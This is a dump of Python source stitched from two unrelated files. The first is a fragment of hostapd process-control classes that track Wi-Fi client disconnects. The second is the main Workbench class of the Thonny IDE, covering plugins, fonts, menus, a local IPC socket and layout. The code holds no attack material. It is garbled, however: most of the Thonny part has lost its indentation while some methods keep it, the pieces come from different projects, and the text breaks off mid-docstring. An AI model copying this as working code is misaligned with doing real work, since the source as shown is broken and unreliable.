            self.cmd, bufsize=1, stdout=PIPE, stderr=STDOUT, universal_newlines=True
        ) as p:
            for line in p.stdout:
                q.put(line)

    def run(self):
        self.queue = Queue()
        self.started = True
        self.procDHCP = Process(target=self.standardProcOutput, args=(self.queue,))
        self.procDHCP.start()
        print("[New Thread {} ({})]".format(self.procDHCP.pid, self.objectName()))
        while self.started:
            self._ProcssOutput.emit(self.queue.get())

    def getpid(self):
        """ return the pid of current process in background"""
        # BUGFIX: restored for parity with the first definition.  Because
        # this class shadows it, callers using getpid()/getID() would
        # otherwise hit AttributeError.
        return self.procDHCP.pid

    def getID(self):
        """ return the name of process in background"""
        return self.objectName()

    def stop(self):
        print("Thread::[{}] successfully stopped.".format(self.objectName()))
        self.procDHCP.terminate()
        self.started = False
        self.queue.close()
class ProcessHostapd(QObject):
    """Controls the hostapd access-point process via QProcess and
    watches its log output for client disconnects and fatal errors."""

    # Emitted with a client MAC when a station disconnects / times out.
    statusAP_connected = pyqtSignal(object)
    # Emitted with the raw log text when hostapd reports a fatal error.
    statusAPError = pyqtSignal(object)

    def __init__(self, cmd, session):
        QObject.__init__(self)
        self.cmd = cmd  # one-entry mapping {executable: [args]}
        self.session = session
        # Substrings of hostapd output that indicate a fatal startup error.
        self.errorAPDriver = (
            "AP-DISABLED",
            "Failed to initialize interface",
            "nl80211 driver initialization failed.",
            "errors found in configuration file",
        )
        self.msg_inactivity = []
        self.queue = Queue()
        self.started = False

    def getpid(self):
        """ return the pid of current process in background"""
        return self.procHostapd.pid()

    def getID(self):
        """ return the name of process in background"""
        return self.objectName()

    def removeInactivityClient(self, client_mac):
        # Drop the disconnected client from the persisted clients file.
        all_clients = Refactor.readFileDataToJson(C.CLIENTS_CONNECTED)
        if client_mac in all_clients.keys():
            del all_clients[client_mac]
        Refactor.writeFileDataToJson(C.CLIENTS_CONNECTED, all_clients)

    def read_OutputCommand(self):
        # Slot: invoked whenever hostapd writes to stdout/stderr.
        self.data = str(self.procHostapd.readAllStandardOutput(), encoding="ascii")
        if (
            "AP-STA-DISCONNECTED" in self.data.rstrip()
            or "inactivity (timer DEAUTH/REMOVE)" in self.data.rstrip()
        ):
            # hostapd puts the client MAC in the third whitespace token
            # of these log lines.
            self.removeInactivityClient(self.data.split()[2])
            self.statusAP_connected.emit(self.data.split()[2])
        # check error hostapd log
        for error in self.errorAPDriver:
            if self.data.find(error) != -1:
                return self.statusAPError.emit(self.data)

    def start(self):
        self.procHostapd = QProcess(self)
        self.procHostapd.setProcessChannelMode(QProcess.MergedChannels)
        self.procHostapd.start(
            list(self.cmd.keys())[0], self.cmd[list(self.cmd.keys())[0]]
        )
        # NOTE(review): connected after start(); output produced before
        # this line could be missed until the next readyRead -- confirm.
        self.procHostapd.readyReadStandardOutput.connect(self.read_OutputCommand)
        self.started = True
        print(
            display_messages(
                "starting hostpad pid: [{}]".format(self.procHostapd.pid()), sucess=True
            )
        )

    def stop(self):
        print("Thread::[{}] successfully stopped.".format(self.objectName()))
        if hasattr(self, "procHostapd"):
            self.started = False
            self.procHostapd.terminate()
|
workbench.py | # -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
running,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.plugins.microbit import MicrobitFlashingDialog
from thonny.plugins.micropython.uf2dialog import Uf2FlashingDialog
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
logger = logging.getLogger(__name__)

# Reply body the single-instance IPC server sends for an accepted request
# (see Workbench._check_init_server_loop).
SERVER_SUCCESS = "OK"
# Views that remain available when the UI runs in "simple" mode.
SIMPLE_MODE_VIEWS = ["ShellView"]

# Menu-item metadata: ordering group, position inside the group, and an
# optional availability tester callable.
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
# Description of a registered backend (interpreter) choice.
BackendSpec = collections.namedtuple(
    "BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)

# Theme settings may be given directly or as a zero-arg callable that
# produces them ("Flexible" variants).
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]

# Third-party plug-ins whose functionality has been merged into Thonny
# itself; skipped during plug-in discovery (_load_plugins_from_path).
OBSOLETE_PLUGINS = [
    "thonnycontrib.pi",
    "thonnycontrib.micropython",
    "thonnycontrib.circuitpython",
    "thonnycontrib.microbit",
    "thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
# self._init_backend_switcher()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self.bind("BackendRestart", self._on_backend_restart, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.event_generate("WorkbenchReady")
self.ready = True
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_statusbar(self):
self._statusbar = ttk.Frame(self)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
    """Create the static layout of the main window.

    Structure: toolbar on top; a horizontal paned window with west / center /
    east vertical paned windows, each holding AutomaticNotebooks for views;
    the editor notebook in the center; a status bar at the bottom.
    """
    margin = 10
    # Main frame functions as
    # - a background behind padding of main_pw, without this OS X leaves white border
    # - a container to be hidden, when a view is maximized and restored when view is back home
    main_frame = ttk.Frame(self)
    self._main_frame = main_frame
    main_frame.grid(row=1, column=0, sticky=tk.NSEW)
    self.columnconfigure(0, weight=1)
    self.rowconfigure(1, weight=1)
    self._maximized_view = None  # type: Optional[tk.Widget]

    self._toolbar = ttk.Frame(main_frame, padding=0)
    self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=margin, pady=(5, 0))

    # default sizes for the resizable panes / notebooks
    self.set_default("layout.west_pw_width", self.scale(150))
    self.set_default("layout.east_pw_width", self.scale(150))
    self.set_default("layout.s_nb_height", self.scale(150))
    self.set_default("layout.nw_nb_height", self.scale(150))
    self.set_default("layout.sw_nb_height", self.scale(150))
    self.set_default("layout.ne_nb_height", self.scale(150))
    self.set_default("layout.se_nb_height", self.scale(150))

    self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
    self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=margin, pady=(margin, 0))
    main_frame.columnconfigure(0, weight=1)
    main_frame.rowconfigure(1, weight=1)

    self._west_pw = AutomaticPanedWindow(
        self._main_pw,
        1,
        orient=tk.VERTICAL,
        preferred_size_in_pw=self.get_option("layout.west_pw_width"),
    )
    self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
    self._east_pw = AutomaticPanedWindow(
        self._main_pw,
        3,
        orient=tk.VERTICAL,
        preferred_size_in_pw=self.get_option("layout.east_pw_width"),
    )

    # view notebooks, keyed by compass location
    self._view_notebooks = {
        "nw": AutomaticNotebook(
            self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
        ),
        "w": AutomaticNotebook(self._west_pw, 2),
        "sw": AutomaticNotebook(
            self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
        ),
        "s": AutomaticNotebook(
            self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
        ),
        "ne": AutomaticNotebook(
            self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
        ),
        "e": AutomaticNotebook(self._east_pw, 2),
        "se": AutomaticNotebook(
            self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
        ),
    }

    for nb_name in self._view_notebooks:
        self.set_default("layout.notebook_" + nb_name + "_visible_view", None)

    self._editor_notebook = EditorNotebook(self._center_pw)
    self._editor_notebook.position_key = 1
    self._center_pw.insert("auto", self._editor_notebook)

    self._statusbar = ttk.Frame(main_frame)
    self._statusbar.grid(column=0, row=2, sticky="nsew", padx=margin, pady=(0))
    self._statusbar.columnconfigure(2, weight=2)

    self._status_label = ttk.Label(self._statusbar, text="")
    self._status_label.grid(row=1, column=1, sticky="w")

    self._init_backend_switcher()
def _init_backend_switcher(self):
    """Create the status-bar button and popup menu for switching backends."""
    # Set up the menu
    self._backend_conf_variable = tk.StringVar(value="{}")
    self._backend_menu = tk.Menu(self._statusbar, tearoff=False)

    # Set up the button
    self._backend_button = ttk.Button(self._statusbar, text="", style="Toolbutton")
    self._backend_button.grid(row=1, column=3, sticky="e")
    self._backend_button.configure(command=self._post_backend_menu)
def _post_backend_menu(self):
    """Build the backend-switcher menu from registered backends and pop it up
    next to its status-bar button."""
    menu_font = tk_font.nametofont("TkMenuFont")

    def choose_backend():
        # Radiobuttons store the chosen configuration as repr() of a dict
        # in _backend_conf_variable; apply each option and restart backend.
        backend_conf = ast.literal_eval(self._backend_conf_variable.get())
        assert isinstance(backend_conf, dict), "backend conf is %r" % backend_conf
        for name, value in backend_conf.items():
            self.set_option(name, value)
        get_runner().restart_backend(False)

    self._backend_menu.delete(0, "end")

    max_description_width = 0
    button_text_width = menu_font.measure(self._backend_button.cget("text"))
    num_entries = 0
    for backend in sorted(self.get_backends().values(), key=lambda x: x.sort_key):
        entries = backend.proxy_class.get_switcher_entries()
        if not entries:
            continue

        if len(entries) == 1:
            self._backend_menu.add_radiobutton(
                label=backend.description,
                command=choose_backend,
                variable=self._backend_conf_variable,
                value=repr(entries[0][0]),
            )
        else:
            # several configurations for this backend -> make a submenu
            submenu = tk.Menu(self._backend_menu, tearoff=False)
            for conf, label in entries:
                submenu.add_radiobutton(
                    label=label,
                    command=choose_backend,
                    variable=self._backend_conf_variable,
                    value=repr(conf),
                )
            self._backend_menu.add_cascade(label=backend.description, menu=submenu)

        max_description_width = max(
            menu_font.measure(backend.description), max_description_width
        )
        num_entries += 1

    # self._backend_conf_variable.set(value=self.get_option("run.backend_name"))
    self._backend_menu.add_separator()
    self._backend_menu.add_command(
        label=tr("Configure interpreter..."),
        command=lambda: self.show_options("interpreter"),
    )

    post_x = self._backend_button.winfo_rootx()
    post_y = self._backend_button.winfo_rooty()
    if self.winfo_screenwidth() / self.winfo_screenheight() > 2:
        # Most likely several monitors.
        # Tk will adjust x properly with single monitor, but when Thonny is maximized
        # on a monitor, which has another monitor to its right, the menu can be partially
        # displayed on another monitor (at least in Ubuntu).
        width_diff = max_description_width - button_text_width
        post_x -= width_diff + menu_font.measure("mmm")

    if running_on_mac_os():
        # won't be good location otherwise
        popup_entry = num_entries + 4
    else:
        popup_entry = ""

    # print(post_x, post_y)
    try:
        self._backend_menu.tk_popup(post_x, post_y, entry=popup_entry)
    except tk.TclError as e:
        if not 'unknown option "-state"' in str(e):
            logger.warning("Problem with switcher popup", exc_info=e)
def _on_backend_restart(self, event):
    """Refresh the status-bar backend button after a backend (re)start."""
    proxy = get_runner().get_backend_proxy()
    if proxy:
        desc = proxy.get_clean_description()
        self._backend_conf_variable.set(value=repr(proxy.get_current_switcher_configuration()))
    else:
        # no live proxy yet -- fall back to the configured backend's description
        backend_conf = self._backends.get(self.get_option("run.backend_name"), None)
        if backend_conf:
            desc = backend_conf.description
        else:
            desc = "<no backend>"

    self._backend_button.configure(text=desc)
def _init_theming(self) -> None:
    """Prepare empty theme registries; actual themes get added later
    (see add_ui_theme / add_syntax_theme)."""
    self._style = ttk.Style()
    self._ui_themes = (
        {}
    )  # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
    self._syntax_themes = (
        {}
    )  # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)

    self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
    self,
    command_id: str,
    menu_name: str,
    command_label: str,
    handler: Optional[Callable[[], None]] = None,
    tester: Optional[Callable[[], bool]] = None,
    default_sequence: Optional[str] = None,
    extra_sequences: Sequence[str] = [],
    flag_name: Optional[str] = None,
    skip_sequence_binding: bool = False,
    accelerator: Optional[str] = None,
    group: int = 99,
    position_in_group="end",
    image: Optional[str] = None,
    caption: Optional[str] = None,
    alternative_caption: Optional[str] = None,
    include_in_menu: bool = True,
    include_in_toolbar: bool = False,
    submenu: Optional[tk.Menu] = None,
    bell_when_denied: bool = True,
    show_extra_sequences=False,
) -> None:
    """Registers an item to be shown in specified menu.

    The command is only stored here; the actual menu item, key binding and
    toolbar button are created later by _publish_commands.

    Args:
        command_id: Unique id; also keys the persisted shortcut option
            ("shortcuts.<command_id>").
        menu_name: Name of the menu the command should appear in.
            Standard menu names are "file", "edit", "run", "view", "help".
            If a menu with given name doesn't exist, then new menu is created
            (with label=name).
        command_label: Label for this command
        handler: Function to be called when the command is invoked.
            Should be callable with one argument (the event or None).
        tester: Function to be called for determining if command is available or not.
            Should be callable with one argument (the event or None).
            Should return True or False.
            If None then command is assumed to be always available.
        default_sequence: Default shortcut (Tk style)
        extra_sequences: Additional shortcut sequences bound to the same handler.
        flag_name: Used for toggle commands. Indicates the name of the boolean option.
        skip_sequence_binding: Register the shortcut without actually binding it.
        accelerator: Text to show next to the menu label (derived from the
            sequence when not given).
        group: Used for grouping related commands together. Value should be int.
            Groups with smaller numbers appear before.
        image: Image name, resolved via get_image.
        caption: Toolbar caption (required when include_in_toolbar is True).
        submenu: Ready-made submenu to attach instead of a plain command.
        bell_when_denied: Ring the bell when the tester rejects invocation.

    Returns:
        None
    """
    # Temporary solution for plug-ins made for versions before 3.2
    if menu_name == "device":
        menu_name = "tools"
        group = 150

    # store command to be published later
    self._commands.append(
        dict(
            command_id=command_id,
            menu_name=menu_name,
            command_label=command_label,
            handler=handler,
            tester=tester,
            default_sequence=default_sequence,
            extra_sequences=extra_sequences,
            flag_name=flag_name,
            skip_sequence_binding=skip_sequence_binding,
            accelerator=accelerator,
            group=group,
            position_in_group=position_in_group,
            image=image,
            caption=caption,
            alternative_caption=alternative_caption,
            include_in_menu=include_in_menu,
            include_in_toolbar=include_in_toolbar,
            submenu=submenu,
            bell_when_denied=bell_when_denied,
            show_extra_sequences=show_extra_sequences,
        )
    )
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
    self,
    command_id: str,
    menu_name: str,
    command_label: str,
    handler: Optional[Callable[[], None]],
    tester: Optional[Callable[[], bool]] = None,
    default_sequence: Optional[str] = None,
    extra_sequences: Sequence[str] = [],
    flag_name: Optional[str] = None,
    skip_sequence_binding: bool = False,
    accelerator: Optional[str] = None,
    group: int = 99,
    position_in_group="end",
    image: Optional[str] = None,
    caption: Optional[str] = None,
    alternative_caption: Optional[str] = None,
    include_in_menu: bool = True,
    include_in_toolbar: bool = False,
    submenu: Optional[tk.Menu] = None,
    bell_when_denied: bool = True,
    show_extra_sequences: bool = False,
) -> None:
    """Create the concrete menu item, key bindings and toolbar button for a
